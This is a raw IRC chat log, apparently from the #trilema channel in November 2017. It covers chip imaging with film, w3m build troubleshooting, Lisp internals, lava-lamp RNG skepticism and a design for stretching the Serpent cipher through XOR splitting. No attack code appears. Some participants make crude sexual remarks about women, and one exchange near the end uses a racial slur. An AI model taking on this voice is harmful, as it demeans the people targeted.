1741946;1511313402;asciilifeform;so can't even say anything re exposure. 1741947;1511313409;mircea_popescu;asciilifeform what reasoning would impel a sane fellow to use fucking polaroids auto-paper, when a bit of film would have about 9k x resolution ? 1741948;1511313440;mircea_popescu;if you're gonna do it like this, why not use a fridge. 1741949;1511313443;mircea_popescu;or a potato. 1741950;1511313467;mircea_popescu;roll some rexona on the chip and throw it against the wall. 1741951;1511313495;asciilifeform;polaroid actually is known to make ~decent adhoc ~beta~ ( the relevant particle, gamma goes ~right through without any useful effect ) film 1741952;1511313522;mircea_popescu;that's not a film, that's a print. 1741953;1511313525;mircea_popescu;film, you can project. 1741954;1511313526;asciilifeform;standard iso photofilm -- does not 1741955;1511313531;asciilifeform;print yes 1741956;1511313560;mircea_popescu;just get some fujiflm. 1741957;1511313583;asciilifeform;i'ma try it with b&w iso film next, because with what else. 1741958;1511313615;mircea_popescu;mind how you calc the distance. 1741959;1511313621;mircea_popescu;dja know how to calc teh distance ? 1741960;1511313632;asciilifeform;it's a contact print in either case 1741961;1511313662;asciilifeform;( even in ideal case, will be a somewhat smudged contact print, because chip die is buried under a lid ) 1741962;1511313676;mircea_popescu;ah 1741963;1511313684;mircea_popescu;i thought you had it exposed. 1741964;1511313700;asciilifeform;nope, saving it for all-in-one microscopy go. 1741965;1511313710;mircea_popescu;yeah makes sense 1741966;1511313784;asciilifeform;http://btcbase.org/log/2017-11-22#1741925 << ooh neato ty 1741967;1511313784;a111;Logged on 2017-11-22 01:08 mircea_popescu: asciilifeform meanwhile original author found item for me : http://www.jeg.ro/titlul-mortii 1741968;1511313791;asciilifeform;îţâşă!! 1741969;1511313825;mircea_popescu;(all the proposed definitions are at least somewhat reasonable) 1741970;1511313851;*;asciilifeform picks 'Se referă la o femeie enervantă care pune prea multe întrebări, deşi nu va înţelege niciodată vreun răspuns.' 1741971;1511313870;mircea_popescu;lol. nb. 1741972;1511313889;mircea_popescu;(to keep form it has to be always feminine anyway, so this works surprisingly well) 1741973;1511313910;asciilifeform;lol! loox like i picked the winning horse... 1741974;1511313943;mircea_popescu;nah, strimb won. 1741975;1511313957;asciilifeform;ah hm yea 1741976;1511314100;*;BingoBoingo to sober time, will likely blog update progress upon return 1741977;1511314107;asciilifeform;btw asciilifeform discovered that his bathroom makes an almost worthless dark room -- has window. and after eyes dilate can see that somewhere far away, faint headlights etc 1741978;1511314133;mircea_popescu;asciilifeform cut up cardboard, coupla inches larger than window, duct-tape on. 1741979;1511314139;asciilifeform;other find : 'scotch' tape is not usable in darkroom experiment : it triboluminesces 1741980;1511314151;asciilifeform;yea stuck doing sumthing with the window. 1741981;1511314152;mircea_popescu;duct tape. 1741982;1511314162;asciilifeform;all stickytape actually. 1741983;1511314178;mircea_popescu;also, shaving foam on the inside of doorway. 1741984;1511314192;mircea_popescu;holy shit turns out i know a lot about field developing. 1741985;1511314200;asciilifeform;doorway was ok, simply cut the lights in the rest of the house. 1741986;1511314209;mircea_popescu;oh cuz you have roof. 1741987;1511314221;asciilifeform;electrical tape for the idjit green led in the mains socket... 1741988;1511314352;asciilifeform;mircea_popescu: lolwat do you mean 'have roof' ? indeed whole thing would be quite impossible outdoors 1741989;1511314370;asciilifeform;unless using one of those field darkroom sacks 1741990;1511314385;asciilifeform;( prolly was the right item actually. that sack, with the arm sleeves ) 1741991;1511314388;mircea_popescu;just being silly. 1741992;1511314435;asciilifeform;hm, interestingly, the crapola inside polaroid is quite nasty, picture alkaline battery that's been rotting for 20 yrs 1741993;1511314475;mircea_popescu;~only utility for those is "baby's first naked pic" back when they didn't shave, didn't suck cock and didn't habitually strip naked in company. 1741994;1511314496;asciilifeform;can't comment, i never in entire life owned the actual camera for them 1741995;1511314514;asciilifeform;always seemed like ripoff, 10-20x the cost of normal film 1741996;1511314685;mircea_popescu;for that exact reason. 1741997;1511314972;mircea_popescu;thinking abouthttp://btcbase.org/log/2017-11-22#1741970, "пизда îţâşă" would make a pretty decent sluttattoo. 1741998;1511314972;a111;Logged on 2017-11-22 01:24 asciilifeform picks 'Se referă la o femeie enervantă care pune prea multe întrebări, deşi nu va înţelege niciodată vreun răspuns.' 1741999;1511322117;BingoBoingo;!~ticker --market all 1742000;1511322122;jhvh1;BingoBoingo: Bitstamp BTCUSD last: 8149.51, vol: 11587.60792112 | Bitfinex BTCUSD last: 8168.4, vol: 61474.95293876 | Kraken BTCUSD last: 8171.3, vol: 4269.44988224 | Volume-weighted last average: 8165.72958568 1742001;1511323058;BingoBoingo;!~bcstats 1742002;1511323059;jhvh1;BingoBoingo: Current Blocks: 495532 | Current Difficulty: 1.364422081125E12 | Next Difficulty At Block: 495935 | Next Difficulty In: 403 blocks | Next Difficulty In About: 2 days, 8 hours, 30 minutes, and 5 seconds | Next Difficulty Estimate: None | Estimated Percent Change: None 1742003;1511323079;BingoBoingo;OMG Crashing, this is bullish for SegCrash 1742004;1511328586;danielpbarron;!!withdraw 0.5 1NmvgX3Z2Rvt48CeNgksT8koP616hx9tB5 1742005;1511328591;deedbot;Get your OTP: http://p.bvulpes.com/pastes/cOZTp/?raw=true 1742006;1511328734;danielpbarron;!!v D0F05C6FC6B6D03BB6CB01C9DEF031CD00831B96AEEEBE071D4B0E1618527BD4 1742007;1511328741;deedbot;http://p.bvulpes.com/pastes/0nsyq/?raw=true 1742008;1511328816;danielpbarron;!!balance 1742009;1511328820;deedbot;http://p.bvulpes.com/pastes/cLaCZ/?raw=true 1742010;1511332464;deedbot;http://www.thedrinkingrecord.com/2017/11/22/and-the-arrangements-continue/ << Bingo Blog - And The Arrangements Continue 1742011;1511332480;BingoBoingo;^ The update 1742012;1511341147;ben_vulpes;solid thread phf, asciilifeform 1742013;1511341249;ben_vulpes;good example of tmsr as antireddit: nothing in the "nollij of crowds", but if yr lucky some sages will come by with a set of koans to set you rethinkin priors 1742014;1511341307;ben_vulpes;in which BingoBoingo sets hisself deadlines! 1742015;1511346207;spyked;http://btcbase.org/log/2017-11-21#1741755 <-- crap. sorry for the confusion! I was thinking about builtin functions, not symbols. need a meaningful way to point symbols to those things, and meaningful way revealed itself once I finally grasped your point. /me proceeds to rewrite symbols+builtin pieces. 1742016;1511346207;a111;Logged on 2017-11-21 19:35 phf: http://btcbase.org/log/2017-11-20#1741176 << i don't need to consider that, i grok metacircularity, i.e. there's no such thing as builtin symbols. bytecode or not is lateral to that point. 1742017;1511346226;jurov;\znc clearallchannelbuffers 1742018;1511346250;jurov;lol sorry 1742019;1511346251;mircea_popescu;lol backwards! 1742020;1511348005;spyked;http://btcbase.org/log/2017-11-21#1741759 , http://btcbase.org/log/2017-11-22#1741862 <-- string not a primitive, but -- "string" datatype aside -- symbol names are (conceptually) strings, so they (the symbol names) require an internal representation etc. cons'ing characters upon reading was simplest approach I found to storing and structuring them. con: list cells introduce memory overhead; pros: avoids arrays and magic numbers like 1742021;1511348005;a111;Logged on 2017-11-21 19:38 phf: http://btcbase.org/log/2017-11-20#1741179 << you can just ignore the whole "string" question in first version, McCarthy's lisp used symbols instead of strings (that's why early nlp code, like eliza all come out as DOG SAID, HELLO) and the only operation you could do at some point was read and eq. 1742022;1511348005;a111;Logged on 2017-11-22 00:33 mircea_popescu: string is not a primitive! 1742023;1511348011;spyked;mccarthy's "up to 30 characters" (ref. Lisp manual Appendix F) 1742024;1511348024;mircea_popescu;"not a primitive" means "nothing can '''conceptually''' be that" 1742025;1511348335;spyked;mircea_popescu, I understood that. the point is, McCarthy's Lisp system still uses strings internally in some form. 1742026;1511348361;mircea_popescu;it might just be that you look at mccarthy's symbols and think "oh strings". 1742027;1511348517;spyked;nono, I look at Lisp symblol *names* and I think "strings", i.e. sequences of characters. 1742028;1511348548;mircea_popescu;whereas odds are mccarthy thought indexes in an array. 1742029;1511348592;mircea_popescu;you're familiar with how industrial technology looked at the time, the machine'd have a list of items internally, and glued on a piece of paper giving the words per item 1742030;1511348615;mircea_popescu;(this mechanism survives in "error codes" lulz even today) 1742031;1511348906;mircea_popescu;and in antique trilemas for the rotaku club (ie, great pieces i'm too lazy to translate), http://trilema.com/2012/pizdita-sau-antropologie-printre-taranii-de-la-oras/ aka mp knows more about "toxic manhood" an' "rape culture" than your local fabecook expert. 1742032;1511350870;RagnarDanneskjol;mircea_popescu I may have someone worth inviting to chan for interview in the coming days. Most of the folks I know over there are primarily oral translators, so having to look around a bit. Just got back yesterday - BJ is a real shithole but the people are adorable, lots of good duck. FYI - 'VPN AC' (Romanian) seems to be the only one working well/consistently behind the firewall (I've used many) and 1742033;1511350870;RagnarDanneskjol;Everbright Bank has, by far, the lowest entry barriers for business or tourist visitors opening new accounts. 1742034;1511352019;mircea_popescu;oh they're still going on with their pretensions to sovereignity and whatnot, "firewalls", bs. 1742035;1511352021;mircea_popescu;lulzy. 1742036;1511353156;shinohai;gm #trilema 1742037;1511353182;shinohai;!~later tell spyked got a question regarding the w3m patch when you have a sec. 1742038;1511353182;jhvh1;shinohai: The operation succeeded. 1742039;1511355708;spyked;morning, shinohai 1742040;1511355753;shinohai;Heya spyked, was looking at your patch last night .... where did you get your w3m source code from if I may ask? 1742041;1511355858;shinohai;https://www.digitaltrends.com/cool-tech/lava-lamps-encryption/ <<< in other faux phuctors (page refuses to archive for me) 1742042;1511355897;spyked;shinohai, sourceforge, unfortunately (w3m devs still host it there for some reason). exact link: https://downloads.sourceforge.net/w3m/w3m-0.5.3.tar.gz same for the njs library; one sec, I'll look it up 1742043;1511355941;shinohai;Its ok spyked .... this is the one I tried, albeit in a Debian VM. ./configure keeps failing for me saying there is no gc 1742044;1511355961;shinohai;though it is available, I'm puzzled. (Your patch did apply cleanly) 1742045;1511355985;spyked;ah crap. yes, I installed the gc lib from the debian repo. I don't know why they removed gc from the w3m tree 1742046;1511356012;shinohai;Hmmm .... I have the gc repo though, still fails. 1742047;1511356041;spyked;that's odd. can you paste somewhere? 1742048;1511356071;spyked;the configure/make output, that is 1742049;1511356134;shinohai;spyked: http://wotpaste.cascadianhacker.com/pastes/ouT0O/?raw=true 1742050;1511356287;spyked;shinohai, I remember getting this as well at some point. can you also paste config.log? the js library bits that I added to ./configure are very hack-ish (IMHO the thing shouldn't be dynamically linked anyway, so I just hacked through it to make it work) 1742051;1511356341;shinohai;Just an aside, I *also* tried this unpatched and get same error. One sec, posting config.log 1742052;1511356428;spyked;(ftr, libgc is why I rebased the patch on w3m-0.5.3 in the first place; for some reason the "mktable" executable generated by w3m was segfaulting in the gc library, while I knew 0.5.3 compiled on my system before, with libgc from debian sources) 1742053;1511356497;shinohai;config.log > http://wotpaste.cascadianhacker.com/pastes/X8A1Z/?raw=true 1742054;1511356527;shinohai;I know I have builit it plenty of times, I'm trying to remember if there was some patch for that, don't recall 1742055;1511356632;shinohai;( I think I used this version tbh https://github.com/tats/w3m ... I loath sourceforge lol) 1742056;1511356689;shinohai;ah ha! https://github.com/tats/w3m/pull/2/files 1742057;1511356781;spyked;shinohai, I know why the patch fails, though not sure why it fails without it... did you also compile and install libnjs? e.g. on line 1840 in config.log, "cannot find -ljs". hm. I am guessing you should have it installed if w3m-0.4 worked for you. 1742058;1511356822;*;shinohai looks 1742059;1511356912;shinohai;Nope, not available in repos either .... got a sauce? 1742060;1511356920;spyked;the original w3m-js patch adds a -ljs compilation/link-time flag. now, there's another issue: if your libjs is in a path that the run-time linker can't find (e.g. /usr/local/lib as opposed to /usr/lib), it will fail again at some point. 1742061;1511356994;spyked;shinohai, https://sourceforge.net/projects/njs/ (would be cool if there was out of sourceforge link too... /me will have to host all these somewhere publicly at some point) 1742062;1511357079;shinohai;grrrr .... thanx for assistance spyked. I rather like w3m (because inline images) but truly needs a lot of cruft removed and things organised - mainly the sourceforge madness. 1742063;1511357237;spyked;all these libraries (gc + njs + others) can be embedded in the original w3m and made self-contained (including removal of shared library nonsense, like gc was linked in 0.4), but they'll require me 1-2 full days. to put on list 1742064;1511357432;spyked;I like w3m as well. the codebase is surprisingly easy to understand (took me a few hours yesterday to get a vague idea of how modules work together), though I have no idea why they need a gc. links is even more minimal, but I use w3m mainly because it runs in emacs. 1742065;1511357537;shinohai;links is nice, it will at least open images in a framebuffer. 1742066;1511357909;shinohai;bah, weird errors trying to build njs .... this is better left to when I can look at a full cleanup. 1742067;1511358075;diana_coman;!!up Abot101 1742068;1511358076;deedbot;Abot101 voiced for 30 minutes. 1742069;1511358331;mircea_popescu;Abot101 who might you be ? 1742070;1511358388;mircea_popescu;http://btcbase.org/log/2017-11-22#1742061 << lotta people do. 1742071;1511358388;a111;Logged on 2017-11-22 13:23 spyked: shinohai, https://sourceforge.net/projects/njs/ (would be cool if there was out of sourceforge link too... /me will have to host all these somewhere publicly at some point) 1742072;1511358404;spyked;hm. shinohai, I remember patching config.sub and config.guess at least. posting a patch in one minute. 1742073;1511358437;shinohai;spyked: I did patch config.sub because it is horrendously old and has no idea what system I was using. 1742074;1511358557;shinohai;oh and good morning Sr. Popescu o/ 1742075;1511358933;spyked;http://p.bvulpes.com/pastes/yVbXl/?raw=true <-- most of it is config.sub and config.guess. two lines at the end may fix shinohai's troubles. anyway, I'ma post the whole thing (w3m+gc+js+whatever else) once I manage to do a static build. 1742076;1511359158;asciilifeform;in other noose, chaum ( see also http://btcbase.org/log/2016-01-10#1365552 ) peddles promisetronic shitcoin, https://archive.is/DQPVe , as if he had any reputation left to burn 1742077;1511359158;a111;Logged on 2016-01-10 23:48 mircea_popescu: hey check that out, zimmerman makes nsa-phone and david chaum makes nsa-gossipd. 1742078;1511359172;mircea_popescu;hola! 1742079;1511359200;mircea_popescu;asciilifeform shameful excuses of the items they pretend to be. 1742080;1511359215;shinohai;Adam Back gonna rage on that one 1742081;1511359289;asciilifeform;meanwhile, https://archive.is/q98xo << intel burns moar amt fritzchip remote nsalogic 1742082;1511359336;asciilifeform;at the same time fixing , i strongly suspect, the bug that recently showed promise of making the whole thing removable 1742083;1511359438;asciilifeform;mircea_popescu: chaum is esp. sad case, was at one time actual thinking d00d, invented afaik hashtronic 'proof of work' , then proceeded to narrowly avoid doing anything useful with it 1742084;1511359481;mircea_popescu;aha. 1742085;1511359503;mircea_popescu;huge strategic mistake publicizing that item, but sadly i r not yet in the position of making ALL the calls. 1742086;1511359520;mircea_popescu;(the bug i mean.) 1742087;1511359585;asciilifeform;'Intel would like to thank Mark Ermolov and Maxim Goryachy from Positive Technologies Research for working collaboratively with Intel on a coordinated disclosure for CVE-2017-5705.' << oh hey named quislings ftr 1742088;1511359619;asciilifeform;mircea_popescu: aha, oughta have been used in mass rapefest 1742089;1511359631;mircea_popescu;just kept under lid for 2-3 years. 1742090;1511359635;mircea_popescu;let them build a lot of the chips. 1742091;1511359635;asciilifeform;coordinated anal waltz, not 'coordinated disclosure' 1742092;1511359653;mircea_popescu;very stupid russki geologists. 1742093;1511359663;asciilifeform;mircea_popescu: it's a fw bug, not silicon , sadly patchable 1742094;1511359693;asciilifeform;( not, say, like the famous fdivbug in '90s ) 1742095;1511359723;mircea_popescu;not so cleanly cut. 1742096;1511359727;mircea_popescu;should have let it pile. 1742097;1511359738;asciilifeform;it piled since 2009 1742098;1511359757;asciilifeform;when they started fritzchipping 1742099;1511359771;mircea_popescu;iirc the early ones were different. 1742100;1511359773;mircea_popescu;aaanyweays. 1742101;1511360187;asciilifeform;http://btcbase.org/log/2017-11-22#1742041 << dun see what this has to do with phuctor... and 'lavarand' existed in '90s ( where is it nao..? ) 1742102;1511360187;a111;Logged on 2017-11-22 13:04 shinohai: https://www.digitaltrends.com/cool-tech/lava-lamps-encryption/ <<< in other faux phuctors (page refuses to archive for me) 1742103;1511360202;asciilifeform;!~google lavarand 1742104;1511360203;jhvh1;asciilifeform: Lavarand - Wikipedia: ; LavaRnd: ; What is LavaRnd?: 1742105;1511360224;shinohai;asciilifeform: posted before full coffee, meant fuckgoats 1742106;1511360248;asciilifeform;was sgi publicity stunt, even patented 1742107;1511360275;asciilifeform;and apparently doomed to be recycled forever by svderps 1742108;1511360396;asciilifeform;( will also point out, the lamps per se contribute ~0 entropy, arrangement is really ~same as hashwhitening output of camera static with the lens cap on ) 1742109;1511360968;mircea_popescu;http://btcbase.org/log/2017-11-22#1741924 << http://trilema.com/2017/Кто-ты-по-жизни/ 1742110;1511360968;a111;Logged on 2017-11-22 01:08 BingoBoingo: Anyways, explaining to normal ordinary people in meatspace who Mircea Popescu is, is surprisingly simple. 1742111;1511360980;*;mircea_popescu is evidently working towards a unified theory of mpdom. 1742112;1511361413;deedbot;http://trilema.com/2017/%d0%9a%d1%82%d0%be-%d1%82%d1%8b-%d0%bf%d0%be-%d0%b6%d0%b8%d0%b7%d0%bd%d0%b8/ << Trilema - ? 1742113;1511361534;shinohai;lol .... `?` 1742114;1511361556;mircea_popescu;unicoarde. 1742115;1511361584;shinohai;deedbot doesn't know who it is in life. xD 1742116;1511361591;mircea_popescu;ahahaha 1742117;1511361709;mod6;mornin' 1742118;1511361746;mircea_popescu;hola 1742119;1511361834;mod6;how goes today? 1742120;1511361858;mircea_popescu;setting up teh yachting for laterz. 1742121;1511361874;mod6;sounds relaxing :] 1742122;1511364678;mircea_popescu;in other lulz : p&g cut 100mn off its "online advertising" budget 2nd q ; saw zero impact. 1742123;1511365028;mod6;heheh 1742124;1511366683;phf;http://btcbase.org/log/2017-11-22#1742041 << it's not surprising that cloudflare's piece doesn't mention lavarand, but the original was invented at SGI and has a couple of patents around it https://www.wired.com/2003/08/random/, https://web.archive.org/web/20010926221159/http://lavarand.sgi.com/ 1742125;1511366683;a111;Logged on 2017-11-22 13:04 shinohai: https://www.digitaltrends.com/cool-tech/lava-lamps-encryption/ <<< in other faux phuctors (page refuses to archive for me) 1742126;1511366712;asciilifeform;phf: see thread 1742127;1511366743;phf;oh bah 1742128;1511366749;asciilifeform;( am i the only one who actually uses phf's very spiffy pointy-hand arrows ? ) 1742129;1511366772;phf;actually i saw your follow up, but stopped reading at "where is it nao..?" 1742130;1511367365;asciilifeform;phf: consider the sheer degree of unabashed cargocultism in the endless rehash of the lava lamp thing 1742131;1511367386;asciilifeform;betcha it will become a 'new' idea at, e.g., google, a few yrs from now. 1742132;1511367392;asciilifeform;and then again somewhere else. 1742133;1511367402;asciilifeform;with bigger, bigger wall of lamps, each time. 1742134;1511367498;*;asciilifeform for some reason unable to turn up the thread in the l0gz where we did the 'rng design is not a technical problem , but a political problem' thing 1742135;1511367695;asciilifeform;also phf's linked pediwiki item is hilarious : '...floating material in lava lamps, extracting random data from the pictures, and using the result to seed a pseudorandom number generator.[1] Although the secondary part of the random number generation uses a pseudorandom number generator, the full process essentially qualifies as a "true" random number generator due to the random seed that is used.' 1742136;1511367698;asciilifeform;didjaknow! 1742137;1511367706;asciilifeform;Essentially Qualifies! 1742138;1511367738;deedbot;danielpbarron: http://p.bvulpes.com/pastes/EnGVs/?raw=true 1742139;1511369470;asciilifeform;in other lulz : http://www.openwall.com/lists/oss-security/2017/11/21/4 ( https://archive.is/N6vFJ ) << 'bignum fuzzer that compares the results of mathematical operations (addtion, subtraction, multiplication, ...) across multiple bignum libraries. Among these is the Go programming language, specifically the "math/big" package [1]. Recently, the fuzzer found a problem in its exponentiation operation...' 1742140;1511369580;asciilifeform;hilarious on multiple levels : bignumtron so large and unfitting in head that it has to be probed via fuzzing, like microshit... 1742141;1511369590;asciilifeform;or how about the 'pre-allocated vs not' nonsense 1742142;1511369600;asciilifeform;or how about bugs in basic arithm routine. 1742143;1511369822;mod6;eek 1742144;1511373907;asciilifeform;in other noose, sci-hub.cc dun resolve nomoar. 1742145;1511373918;asciilifeform;( anyone outside of gringolandia wanna try ? ) 1742146;1511374652;asciilifeform;... sci-hub.la turns out still worx ( reminds of ye olde mpex... ) 1742147;1511374855;diana_coman;asciilifeform, works from here 1742148;1511374873;asciilifeform;unsurprising 1742149;1511375416;asciilifeform;( see also http://btcbase.org/log/2017-09-30#1718499 etc ) 1742150;1511375416;a111;Logged on 2017-09-30 00:25 cazalla: BingoBoingo, ah okay :\ dailystormer just got shoah'd again, this time from .is extension heh 1742151;1511380770;mod6;asciilifeform: if there are updates (that are complete & published) for MPI, you may want to update the BTC-Dev ML with the new changes, and reference the original: http://therealbitcoin.org/ml/btc-dev/2015-October/000175.html 1742152;1511380839;asciilifeform;mod6: whole thing is at http://www.loper-os.org/?p=1533 1742153;1511380870;asciilifeform;orig & update , both properly vtronic 1742154;1511380883;asciilifeform;also on phf's http://btcbase.org/patches?patchset=mpi&search= 1742155;1511380926;asciilifeform;mod6: trb ml was really not imho the proper place for it: mpi is not used in trb 1742156;1511380952;mod6;yeah, the first message says as much. 1742157;1511380975;mod6;i just happened to stumble across it and also thought "this is out of date too..." 1742158;1511380995;asciilifeform;feel free to upload the vdiffs/sigs to the ml yourself if you can think of a reason why it belongs there 1742159;1511381468;BingoBoingo; in which BingoBoingo sets hisself deadlines! << Sets deadlines for self, and establishes expectations based on collected information. 1742160;1511381610;BingoBoingo;In other news. USG.blue youth program has instructed parents to not have their daughters hug family members and to discourage hugging especially in cases where girl has recieved gift from said family membe 1742161;1511381621;BingoBoingo;r 1742162;1511381635;ben_vulpes;wat 1742163;1511381640;BingoBoingo;This isnstruction is not specific to throbbing family members 1742164;1511381677;BingoBoingo;ben_vulpes: Apparently teaches girls to respond to favors with affection, Grill Scouts says bad family 1742165;1511383915;deedbot;http://www.dianacoman.com/2017/11/22/taming-of-the-serpent-in-ada/ << Ossasepia - Taming of the Serpent in Ada 1742166;1511385156;asciilifeform;oh hey hey hey ljb! 1742167;1511385171;*;asciilifeform reads 1742168;1511385211;diana_coman;asciilifeform, let me know if you see anything weird in there 1742169;1511385236;asciilifeform;diana_coman: well 'a candidate replacement for the algorithm used at that time under the name of “Advanced ..' is not quite it, they competed for the usg tourney crown 1742170;1511385263;asciilifeform;the item at the time known as 'rijndael' was crowned by nsa, and was proclaimed 'aes' 1742171;1511385328;diana_coman;hm, right; creation of "aes" rather than replacement, right 1742172;1511385342;asciilifeform;http://btcbase.org/log/2015-01-17#981006 << thread. possibly elsewhere. 1742173;1511385342;a111;Logged on 2015-01-17 22:38 asciilifeform: or, alternatively, like the choice of 'aes' over the stronger but 'slower' 'serpent' cipher, it was merely orders from lizardhitler. 1742174;1511385357;diana_coman;replacement for des rather 1742175;1511385379;asciilifeform;aha. 1742176;1511385384;asciilifeform;!#s from:asciilifeform aes 1742177;1511385384;a111;81 results for "from:asciilifeform aes", http://btcbase.org/log-search?q=from%3Aasciilifeform%20aes 1742178;1511385397;asciilifeform;!#s from:mircea_popescu aes 1742179;1511385397;a111;38 results for "from:mircea_popescu aes", http://btcbase.org/log-search?q=from%3Amircea_popescu%20aes 1742180;1511385405;asciilifeform;^ possibly in there, actually. re the faux 'contest'. 1742181;1511385483;diana_coman;updated; I'll read and link when I find it, as it should be linked I think 1742182;1511385555;asciilifeform;the process whereby rijndael became usg's national One Troo Cipher was as dubious a thing as could be expected. 1742183;1511385618;diana_coman;well, I was trying to keep my scope there relatively narrowly focused on serpent itself; it's not a very short post as it is anywya 1742184;1511385692;diana_coman;found this so far: http://btcbase.org/log/2016-12-28#1591982 1742185;1511385692;a111;Logged on 2016-12-28 17:09 asciilifeform: the political history is also rather interesting (it was on track to winning the 'aes competition', received fewest thumbs-down votes from the panelists, but mysteriously torpedoed by usg and did not win) 1742186;1511385696;asciilifeform;truth be told, all published symmetric ciphers are fundamentally liquishit, and for approximately the same reason ( http://btcbase.org/log/2016-06-06#1477746 ) . they divide merely into the 'already publicly broken' and 'not yet' 1742187;1511385696;a111;Logged on 2016-06-06 21:37 asciilifeform: i find it also very interesting that all aes-like ('boxes') cryptosystems are direct descendants of rotor machines. which were known to be pseudoscientific even when first built, as vernam existed 1742188;1511385777;asciilifeform;http://dianacoman.com/available_resources/nessie_vectors.txt << 404 btw 1742189;1511385791;*;diana_coman checks 1742190;1511385877;diana_coman;it is there now 1742191;1511385888;diana_coman;I could have sworn I *did* upload it but apparently..I hadn't 1742192;1511386563;diana_coman;asciilifeform, mind expanding a bit on what you had in mind as best way to expand serpent to 512 bits blocks? 1742193;1511386686;diana_coman;and 512 bits key too for that matter 1742194;1511386842;asciilifeform;to expand a K-bit (block and key, we'll assume, are each K-bit) voodoocipher to J bitness, xor split ( on rng ); having generated J / K independent keys; each incoming plaintext block of J bits, is cut into J / K blocks, and each enciphered with the corresponding key. decipher -- same. 1742195;1511386866;asciilifeform;xor split each plaintext block, that is 1742196;1511386970;asciilifeform;actually nm 1742197;1511386985;asciilifeform;this is wrong; and the correct algo is in the l0gz... 1742198;1511387114;asciilifeform;anyway for 512bit key, you still keep the 128bit block. but each time you have incoming 128b plaintext, you shamir it rngistically into 512bits, i.e. 4 128b parcels that must be xor'd to reconstitute the original. each of these get ciphered with one of 4 independently-generated 128b keys. 1742199;1511387145;diana_coman;hm, I probably did not know how to search for it properly as I did look but still not very clear on it 1742200;1511387154;asciilifeform;on the decipherment end, each split gets deciphered with the respective 128b key , and the four parcels xor'd to form the plaintext again. 1742201;1511387176;asciilifeform;does this make sense ? 1742202;1511387191;diana_coman;ah, it was the construction on top you had in mind 1742203;1511387218;asciilifeform;the 1 aspect that historically bothered me, is that enemy knows now a relation between the plaintexts in the 4 streams 1742204;1511387255;asciilifeform;sorta how i ended up exploring the http://btcbase.org/log/2016-12-24#1589881 item 1742205;1511387255;a111;Logged on 2016-12-24 01:03 asciilifeform: picture the following 1-dimensional automaton, that eats bitstring in sets of 2bits, and : '10' -> 'tape step left' ; '01' -> 'tape step right' ; '11' -> invert bit at current square; '00' -> terminate. 1742206;1511387268;asciilifeform;( i see it as a still-unsolved problem. ) 1742207;1511387390;asciilifeform;back to the shamir scheme : the only thing i can properly prove about it, is that it isn't weaker than straight single-key-with-no-splits 1742208;1511387495;asciilifeform;and, on top of this, each stream ~individually~ is not distinguishable from rngolade. 1742209;1511387584;asciilifeform;anyway orig method is in log, http://btcbase.org/log/2017-02-25#1618462 << merely in application to slightly different form of the problem ( how to combine voodoociphers in such a way that the result can in no circumstances be weaker than the strongest of the items ) 1742210;1511387584;a111;Logged on 2017-02-25 21:26 asciilifeform: so, for instance, you can prove that a k-of-k (must have ALL parts) shamir split, where you then take each share and encipher with different method -- will NEVER be weaker than the strongest cipher used. 1742211;1511387635;asciilifeform;you thereby get a 'ratchet'. which afaik is the only hard strength result in all of crypto aside from von neumann's otp proof... 1742212;1511387650;asciilifeform;( which it is really but a restatement of ) 1742213;1511387703;diana_coman;yes, I had found that one; for some reason I thought you had in mind a different approach for expanding block + key size for serpent itself 1742214;1511387728;asciilifeform;nope. it isn't a keccak-like thing, isn't 'rubber' 1742215;1511387735;asciilifeform;not defined for any kind of stretching. 1742216;1511387807;asciilifeform;my approach is a universal 'stretcher', predicated on having reasonably fast and high-quality trng. 1742217;1511387899;asciilifeform;( your encipherment speed is limited to 1/S of your rng's bit rate, where S is the splitness ) 1742218;1511388389;*;asciilifeform brb,teatime 1742219;1511388428;diana_coman;I think I need to read more on this, so I'll hit the books 1742220;1511388428;*;shinohai has enjoyed asciilifeform 's and diana_coman 's exchange and also goes to tea [~} 1742221;1511388592;ben_vulpes;"School superintended Keith Marty said it was a surprise to staff that the student responsible was not white." still? STILL a surprise? http://www.dailymail.co.uk/news/article-5108107/Student-writes-white-lives-matter-N-word-mirror.html 1742222;1511388667;trinque;how did someone writing niggers in a school bathroom make the news? 1742223;1511388678;trinque;they didn't even shoot anyone 1742224;1511389052;ben_vulpes;writing niggers on the wall is basically shooting babies, trinque omfg be more sensitive 1742225;1511389805;mod6;ya srsly 1742226;1511389885;shinohai;lmfao this thread 1742227;1511390769;asciilifeform;diana_coman: lemme give specific example. start with splitting 1 byte. to split byte B into X and Y, you take byte R from rng, and compute B xor R = X. then Y = R . X xor Y = B . 1742228;1511390836;asciilifeform;diana_coman: now let's split 1 byte into ~four~, A,B,C,D. we take same transform and do it to X and Y in turn. in total, we've used 4 bytes from rng device, to cut 1 byte into 4 otpfrags. 1742229;1511390881;mircea_popescu;http://btcbase.org/log/2017-11-22#1742164 << hey, next the "instruction function of soviet pioneer org in protecting the poor clueless adults from toxic facts and hate truth" will emerge. and then, probably, the NEP. and then, i guess, the http://trilema.com/2014/the-problem-of-enforcement/#footnote_0_55204 1742230;1511390881;a111;Logged on 2017-11-22 20:14 BingoBoingo: ben_vulpes: Apparently teaches girls to respond to favors with affection, Grill Scouts says bad family 1742231;1511390953;diana_coman;asciilifeform, that makes perfect sense, yes 1742232;1511390988;asciilifeform;diana_coman: observe that knowing 1,2,or even 3, gives you 0 bits of info re the original. 1742233;1511391017;asciilifeform;( in the shannon sense. you haven't narrowed down what the 4th could be, by knowing 1..3 ) 1742234;1511391110;diana_coman;aha 1742235;1511391129;mircea_popescu;http://btcbase.org/log/2016-02-06#1398048 << and so on 1742236;1511391129;a111;Logged on 2016-02-06 16:55 mircea_popescu: derp #1 : "What is wrong with existing block ciphers like AES? AES has been in widespread use for over a decade and to the best of my knowledge, there is still no practical attack on it (unless someone has built a working quantum computer and not told anyone about it). Its totally free of patents and IP issues. Its been implemented in a huge variety of hardware and software (including the Intel CPU that I am using to m 1742237;1511391180;mircea_popescu;hm that;s still kinda late. 1742238;1511391225;asciilifeform;there was an earlier one... http://btcbase.org/log/2014-09-07#821750 1742239;1511391225;a111;Logged on 2014-09-07 17:56 mircea_popescu: i wasn't aware this is public knowledge. 1742240;1511391245;mircea_popescu;http://btcbase.org/log/2015-07-12#1198022 there's actually lotta these 1742241;1511391245;a111;Logged on 2015-07-12 03:17 mircea_popescu: asciilifeform http://trilema.com/2014/minigame-smg-august-2014-statement/#comment-114754 << don't you find it a little odd that even on an obscure liuttle game such as eulora, someone does find the time to carefully probe me about aes ? 1742242;1511391260;asciilifeform;right, plenty 1742243;1511391264;mircea_popescu;apparently AES is one of those topics where someone could just pick up the log discussion 